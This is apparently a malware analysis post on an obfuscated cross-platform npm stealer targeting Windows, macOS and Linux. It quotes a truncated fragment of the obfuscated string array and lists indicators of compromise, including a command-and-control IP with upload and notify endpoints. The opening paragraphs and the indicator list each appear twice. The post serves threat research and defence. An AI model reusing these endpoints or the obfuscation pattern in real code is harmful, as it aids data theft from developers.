Cross-Platform NPM Stealer
Contents
Cross-Platform NPM Stealer
I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as “extracted-decoded.js” (and reformated). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. It did not run properly in a sandbox so only a static analysis was performed.
The key point is that it is a cross-platform stealer targeting Windows (WSL), macOS and Linux. Good news for us, only the “wrapper” that is responsible for the execution is obfuscated but the malicious payloads are embedded in plain text! The obfuscation technique looks typical to the code produced by obfuscation.io[2]. We are facing a very long array of small Base64-encoded strings:
function c() { const t8 = ["W54gaGuj", "pSkByhzh", "WRT/WPThyG", "CSomW6OXWQG", "WO7dIuVcTaq", "AYb2Axm", "WPT3WPJdLmkS", "WPTNeuWa", "hCkIW64XW7C", "W47cM0tcObS", "WPKbWOKfW74", "W6JdNCkDWRe+", "W53dLuxcP3u", "WRTUc8ocW4W", "ysiSica", "wCo4oser", "tSkAW5v3ca", "W54XaKvz", "W7nTe8ooW7a", "W4BcSSo/FLi", "W6HvW7i+FG", "W5iBabul", "F8oQW4JcVCku", "W5ldPCkKbcy", "W6ddQcdcNq0", "Aw5Niha", "Dcy9W5dcVq", "C8o/eqBcHW", "id0GBMu", "W5FcISkyW4FcJG", "WR1ieSotW4y", "wSoqq8o1da", "B3jKvMe", "icDmB2m", "uSkgW4qZiq", "WO7cMSkoW7zX", "W5HxW6OnW7S", …
I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as “extracted-decoded.js” (and reformated). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. It did not run properly in a sandbox so only a static analysis was performed.
The key point is that it is a cross-platform stealer targeting Windows (WSL), macOS and Linux. Good news for us, only the “wrapper” that is responsible for the execution is obfuscated but the malicious payloads are embedded in plain text! The obfuscation technique looks typical to the code produced by obfuscation.io[2]. We are facing a very long array of small Base64-encoded strings:
function c() { const t8 = ["W54gaGuj", "pSkByhzh", "WRT/WPThyG", "CSomW6OXWQG", "WO7dIuVcTaq", "AYb2Axm", "WPT3WPJdLmkS", "WPTNeuWa", "hCkIW64XW7C", "W47cM0tcObS", "WPKbWOKfW74", "W6JdNCkDWRe+", "W53dLuxcP3u", "WRTUc8ocW4W", "ysiSica", "wCo4oser", "tSkAW5v3ca", "W54XaKvz", "W7nTe8ooW7a", "W4BcSSo/FLi", "W6HvW7i+FG", "W5iBabul", "F8oQW4JcVCku", "W5ldPCkKbcy", "W6ddQcdcNq0", "Aw5Niha", "Dcy9W5dcVq", "C8o/eqBcHW", "id0GBMu", "W5FcISkyW4FcJG", "WR1ieSotW4y", "wSoqq8o1da", "B3jKvMe", "icDmB2m", "uSkgW4qZiq", "WO7cMSkoW7zX", "W5HxW6OnW7S", …
IoC
https://github.com/axios/axios
http://216.126.225.243:8087/api/notify
https://www.virustotal.com/gui/file/049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9
https://socket.dev/blog/north-korea-contagious-interview-npm-attacks
http://216.126.225.243:8086/upload
https://obfuscator.io
216.126.225.243
049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9
http://216.126.225.243:8087/api/notify
https://www.virustotal.com/gui/file/049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9
https://socket.dev/blog/north-korea-contagious-interview-npm-attacks
http://216.126.225.243:8086/upload
https://obfuscator.io
216.126.225.243
049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9